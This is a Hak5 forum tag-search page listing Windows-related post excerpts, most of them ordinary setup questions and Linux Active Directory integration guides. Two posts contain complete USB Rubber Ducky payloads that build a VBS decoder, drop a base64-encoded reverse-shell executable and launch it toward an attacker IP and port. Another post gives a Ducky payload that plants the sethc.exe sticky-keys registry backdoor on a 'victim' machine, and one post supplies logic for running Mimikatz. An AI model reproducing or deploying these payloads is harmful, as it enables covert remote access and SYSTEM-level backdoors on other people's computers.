Jump to content

Search the Community

Showing results for tags 'WINDOWS'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Hello all, This is just a small bit of logic to pull the architecture type from the machine and based on that, perform different functionality calls IE: for Mimikatz using both the 32 / 64 bit versions or with procdump specifying -64 for 64 bit machines or not... etc. STRING wmic computersystem get SystemType | find "x64" >nul&& (set "SystemType=64bit") || (set "SystemType=32bit") Anyhow, you'd put in logic after this which would run your different executable based on the %SystemType% var I'll write up a full demo script in a bit for those of you wanting an example. Thank you. Enjoy!
  2. hey i running a windows PC and i want to know how to set up urlsnarf. in windows. i clicked start urlsnarf and nothing happened.
  3. Configuring Active Directory Accounts For Linux You may have followed our previous article detailing step by step how to integrate your RHEL 6 box into a Windows Active Directory environment Being able to authenticate users and services to active directory from linux is a big plus but it’s not where this journey ends. We need to setup users default home directories and default shells before we can really allow users to login and start using your server. There are two ways to accomplish this, if you have Unix Identity Management Services installed on your domain controller you will have an easy way to set these configuration inside active directory. From Windows Inside server manager select your Active Directory Domain Services, right click to Add Role Services. Make sure these roles are installed. Once you have installed these Role Services we can continue. If you want to administer active directory from your workstation, make sure you have the correct AD Administrative tools installed. Make sure you have local admin rights on your workstation. Once you have the correct tools installed open up Active Directory Users and Computers. Find a “test” user and open their properties. You will now see a new tab called UNIX Attributes. Specify Linux configs from Active Directory From here you can specify the UID(which will be assigned upon logging into linux), Login Shell, Home Directory, and Primary Group. We aren’t going to go into detail on NIS domain because this is only important for older configuration of SSSD and ldap, krb5 etc. Let’s run a getent and see what Linux pulls from Active Directory [root@server tmp]# getent passwd test test:*:940001114:940000513:test:/home/test@YOURDOMAIN.COM:/bin/bash Doesn’t match what’s in Active Directory? Read the linux part of this article to find out why. From Linux Remember that thing called SSSD? If not please go back and read this. Let’s add a few lines to our sssd.conf override_homedir = /home/%f override_shell = /bin/bash **Must restart SSSD to take effect** service sssd restartOnly add these lines if you desire this functionality, either way is fine, however if you have a more complex AD environment it sometimes is easier inside SSSD to implicitly imply what configurations you want for your users. In this example we have told SSSD that each AD user that logs in home directory is /home/username(will be created by oddjob) and that we want their default shell to be /bin/bash. Most Linux users will expect this to be their default environment. There you have it. Go forth and shell with your active directory accounts.
  4. Red Hat Linux Active Directory Integration Can Linux boxes exist in a Windows Active Directory domain? The answer has been yes for a long time. However until very recently this has been a very painful and tedious process. Exporting certifications, trial and error config files, changing security settings on domain controller, a major headache. Thankfully RedHat has actually realized this was a problem. It’s funny that while Server 2012 is already released RedHat just not added a simple method to integrate authentication with a Windows Active Directory domain. We are a release behind, better now than ever. The real OS of choice. NOTE: All Sample Configs are located at the bottom of this page. To start this article ONLY applied to: Red Hat Enterprise Linux 6.4 CENTOS 6.4 You can find out your verion by using cat /etc/system-release (CENTOS)cat/etc/redhat-release (Red Hat) If you are not familiar with SSSD(System Security Services Daemon) then I suggest you do some reading before you dive into this article. Also this is more gear towards Linux admins and not Windows admins. With these new changes you won’t have access your windows admin for anything, well unless you need that domain admin access of course. BEFORE WE DO ANYTHING ALWAYS BACKUP YOUR CONFIGS authconfig --savebackup=mybackup First to get started let’s check what version of SSSD you have installed on your box. NOTE: If a domain name is in CAPS it is on purpose. This was not done for show. rpm -q sssd You will need at least SSSD 1.9.2 for this. Let’s go ahead and setup all of the nessesary nss and pam config files. authconfig --enablesssd --ldapserver=ldap://dc1.youdomain.com --ldapbasedn="dc=YOURDOMAIN,dc=COM" --enablerfc2307bis --enablesssdauth --krb5kdc=dc1.youdomain.com --krb5realm=YOURDOMAIN.COM --disableforcelegacy --enablelocauthorize --enablemkhomedir --updateallvi /etc/krb5.conf[logging] default = FILE:/var/log/krb5libs.log kdc = FILE:/var/log/krb5kdc.log admin_server = FILE:/var/log/kadmind.log[libdefaults] default_realm = YOURDOMAIN.COM dns_lookup_realm = false dns_lookup_kdc = false ticket_lifetime = 24h renew_lifetime = 7d forwardable = true#These encryption types are required for ntvlmi and krb5i(packet signing)default_tgs_enctypes = rc4-hmac aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96default_tkt_enctypes = rc4-hmac aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96permitted_enctypes = rc4-hmac aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96 [realms] YOURDOMAIN.COM = { kdc = domaincontroller.yourdomain.com:88 admin_server = domaincontroller.yourdomain.com:749 default_domain = yourdomain.com }[domain_realm] .yourdomain.com = YOURDOMAIN.COM yourdomain.com = YOURDOMAIN.COM Next vi /etc/samba/smb.conf[global] workgroup = YOURDOMAIN client signing = yes client use spnego = yes kerberos method = secrets and keytab log file = /var/log/samba/%m.log realm = YOURDOMAIN.COM security = adsvi /etc/sssd/sssd.conf[sssd] config_file_version = 2 services = nss, pam domains = YOURDOMAIN.COM[nss] nss_filter_groups = root nss_filter_users = root nss_entry_cache_timeout = 30 nss_enum_cache_timeout = 30 [domain/YOURDOMAIN.COM]id_provider = ad ad_server=domaincontroller.yourdomain.com ad_domain=yourdomain.com Now you will need a active directory account with administrator privledges to add a machines to the domain. Before you run kinit make sure you update your time with a domain controller. ntpdate dc1.youdomain.com Once Time is synced continue with.. kinit administrator Type your password. Confirm that you have received a kerberos ticket but using klist If you do not see any tickets please refer to your logs. SSSD is some what helpful inside /var/log/messages Now we have a ticket we need to add this machine to the domain. net ads join -k If you receive a success message your new linux box should be inside active directory inside the default Computers Group. Verify with an Active Directory Admin to make sure your server object was created. Let’s run: service sssd restart If you did not receive any warning messages inside /var/log/messages we should be good to go. Test by running id yourusernamead and getent passwd yourusernamead You should be able to look up accounts at this point. Now the best part of this. Let’s setup Putty and SSHD to use your kerberos key to authenticate into your linux box. As you noted inside our sssd.conf we have added root accounts not to use AD authentication. First let’s make some changes to our SSHD configs. vi /etc/ssh/sshd_conf Make sure you have this line un commented GSSAPIAuthentication yesvi /etc/ssh/ssh_confGSSAPIAuthentication yes GSSAPIDelegateCredentials yes Also before trying to use Putty make sure you have a newer release and make sure your authentication settings are setup as follows: Make sure this is enabled. Now open a new session to your linux box. Type in your active directory username and press enter. If kerberos negotiation is successful you will NOT be prompted for a password. Happy Shelling Sample Config Files krb5.conf sssd.conf ssh_conf sshd_conf If you are a RedHat subscriber you can read their article on this subject here.
  5. hey gang! Ok so I'm trying to automate a script for my mother so I can get her work laptop MAC filtered into her home network. She so conveniently keeps forgetting it at work. Bring in the Duck!! Here's my goal: I want to create a payload to where it opens up cmd, does "ipconfig /all", saves what the terminal session spits out to a .txt in the c:\ drive, then copy that newly created .txt to the duck. Here's what I got, that doesn't work: delay 800 gui x (I'm testing this on my windows 8 machine, she still runs XP SP3) up up enter string CMD string ipconfig /all >c:\ipdata.txt ; copy /A ipdata.txt f:\ /A /V delay 300 When I test this on my win8 box, it does open cmd, but after it does a bunch of other crazy things. However if I take the code down to just: delay 800 gui x up up enter string cmd I get the cmd window normally. any ideas?
  6. Up until recently I've been hosting a website from home, which I've mainly been using as a sandbox site and repository. I have been using Windows 7 Ultimate, XAMPP 1.81, DirectUpdate and a dynamic DNS address. I've whitelisted XAMPP through Windows Firewall and allowed traffic through the router's NAT to my PC which is on a static IP at home. I also use BitVise WinSSHd as an SSH server, using virtual profiles rather than Windows Authentication. It's all worked really well up to now, but after speaking to a few people, they've said that you should never use XAMPP or the like for publicly accessible websites. To that end, I've been wondering what is the most secure and most recommended way to run a website from home? So, starting with a fresh and fully updated version of Windows 7 Ultimate, where do I go from here? Also one side-question; can you run Apache and IIS concurrently on the same machine and have both serve websites on virtual hosts?
  7. If i team 2 or more NIC's, does each nic still keep their pysical ip address even though virtual one has been created? Am asking this because i currently have a Windows Server 2012 Server with a Dual Gigabit PCI-X card with an IP set on each ethernet port, and each one is linked to an FTP server. am wondering if i do the NIC teaming will this conflict with the dedicated ftp servers.
  8. I'm trying to run the Windows Reverse Shell Payload on a 64 bit system, and I get the error: "C:\reverse.exe is not a valid Win32 application." Is there something wrong with the payload itself? Or does it not run on 64-bit systems? Script below. Any help would be greatly appreciated! DELAY 1000 ESCAPE ESCAPE DELAY 400 WINDOWS R DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\reverse.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER STRING c:\reverse.exe 192.168.1.47 8080 ENTER STRING pause ENTER
  9. I can't connect or set up my new Wi-Fi Pineapple. I followed the steps in the guide and online exactly to the best of my knowledge. I don't see why this isn't working. It should be pretty simple, but for whatever reason, it just doesn't want to work. I can provide more details if needed. Please help, thanks! Pineapple Hardware Version (ex: Mark III, Mark IV, etc.): Mark IV Pineapple Software Version (ex: 2.5.0, 2.6.4): Whatever the default firmware it shipped with is (I didn't change it as I can't do anything) OS used to connect to the pineapple: Windows 7 Network layout of how your setup is connected (including IP information): I connect to the internet with a Wi-Fi connection (Wireless Network Connection). I connected the pineapple to my Ethernet port on my laptop to the pineapple's WAN/LAN port (Local Area Connection). Here is the result from ipconfig: Wireless LAN adapter Wireless Network Connection: Connection-specific DNS Suffix . : gateway.pace.com Link-local IPv6 Address . . . . . : fe80::e1e5:c468:b293:8a1a%15 IPv4 Address. . . . . . . . . . . : 192.168.1.67 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.254 Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::9de3:238d:91f7:1c1c%13 IPv4 Address. . . . . . . . . . . : 172.16.42.42 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : All the tools/options that are running on the pineapple when the issue happened: Default Ping results from computer to pineapple: C:\Users\Dr Dinosaur>ping 172.16.42.42 Pinging 172.16.42.42 with 32 bytes of data: Reply from 172.16.42.42: bytes=32 time<1ms TTL=128 Reply from 172.16.42.42: bytes=32 time<1ms TTL=128 Reply from 172.16.42.42: bytes=32 time<1ms TTL=128 Reply from 172.16.42.42: bytes=32 time<1ms TTL=128 Ping statistics for 172.16.42.42: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms C:\Users\Dr Dinosaur>ping 172.16.42.1 Pinging 172.16.42.1 with 32 bytes of data: Reply from 172.16.42.42: Destination host unreachable. Request timed out. Request timed out. Request timed out. Ping statistics for 172.16.42.1: Packets: Sent = 4, Received = 1, Lost = 3 (75% loss), Is the problem repeatable (Yes/No): Yes Steps taken which created the problem: The initial set up for Windows (on the included book and from http://cloud.wifipin...guidequickstart) Error Messages: Google Chrome could not connect to ... Log file information: Not sure where to get this from (if possible with no valid connection). Anything else that was attempted to 'fix' the problem: Re-tried setup. I also tried to connect to my BT5RC3 VM with no luck.
  10. Guys, I take no credit for this payload.... I just took an already working payload and made some minor tweeks (the way the command prompt is opened) to make more it reliable for my personal use. The original code can be found here; https://securepla.net/download/ducky.txt DELAY 600 ESCAPE ESCAPE DELAY 400 WINDOWS R DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\reverse.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER STRING c:\reverse.exe 172.16.1.7 4444 ENTER STRING exit ENTER
  11. Hi So i know there are many posts on setup. but something that is unique about mine is that, In the book, It shows that the Pineapple is using an Intel® PRO/1000 MT Desktop Adapter #2. well mine is not showing that. also after I follow that steps in this book. and try to go to 174.16.42.1, My browser can't connect to it. and I have looked at some post and videos, but I still can't figure things out. Also it is showing its connect using Microsoft Virtual WiFi Miniport Adapter.
  12. I have been trying to figure out a way to get several of my Win 7 laptops to be able to automatically create / initialize an ad-hoc network when they boot up, or connect to the already initialized ad-hoc network if it is present. I want all of the computers to automatically connect to each other. Think 5 robots coming online and about to interact with each other, with no AP, or Router nearby. I have been working with netsh commands and setupSNK.exe, but no joy. It seems Windows blocked all the automatic connections for ad-hoc networks due to some security concerns. Does any one know of a way to get Windows to allow an automatic connection of this type?
  13. Hey all, first post so im not sure as to where to put it, but i read about this coming out recently and wanted to share with the Hak5 community. http://www.extremetech.com/computing/138363-the-cia-de-blurs-license-plates-from-outer-space-now-you-can-too-for-free if its TL:DR for you then basically what it is, is a program that allows you to remove blurr from photos or things like Google maps and the like, as far as i know its legal, i haven't found anything stating otherwise.
  14. Hi Guys ! I want to know what ip number range is used on my network... just want to confirm whether i'm using the right command? nmap 192.168.210.0/24[/CODE] and if you could also explain how it works... btw thanks in advance Regards, Ewa
  15. I know that if you have physical access to a computer, it's pretty much owned. But the reason I wanted to make a rubber ducky payload of this old backdoor is that you only need a few seconds to install the backdoor. I.e when the victim leaves his/hers computer unattended without putting on screen saver with password, you put in the rubber ducky and install this payload. After this you can a) press the SHIFT key continuously for 5 times or B) Alt+Shift+PrintScreen which will open a command prompt with system privilege. Simple and cool :-) Make sure to take a backup of the original sethc.exe. I have had some encoding issues, be sure to check out which keyboards the rubber ducky firmware supports. I have edited the code without testing it again, but I think it still will compile and run as planned. Tune the delay parameter for your own pc. I have made the delays long enough for you to see what's happening. Enjoy. The victims machine must have admin privileges for this to work. REM Author: Asbjørn Reglund Thorsen <art@awaresec.no> REM Target: Tested on Windows 7 REM Description: Replaces the "Sticky keys" on windows 7s login screen with the "command prompt" executable REM References: http://carnal0wnage....ticky-keys.html REM http://www.redmondpi...n-login-screen/ ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 DOWN DELAY 400 DOWN DELAY 1000 ENTER DELAY 1000 LEFT DELAY 1000 ENTER DELAY 1000 STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" STRING /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" DELAY 400 ENTER REM Notes: REM Thanks to Espen Grøndal who told me about this "feature" REM The trick does not work when the Sticky Keys are disabled. REM If you see the message that says “The operation completed successfully”, that means you have installed the backdoor. REM Cleanup: You can use reg edit and browse to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" and remove the sethc.exe file.
×
×
  • Create New...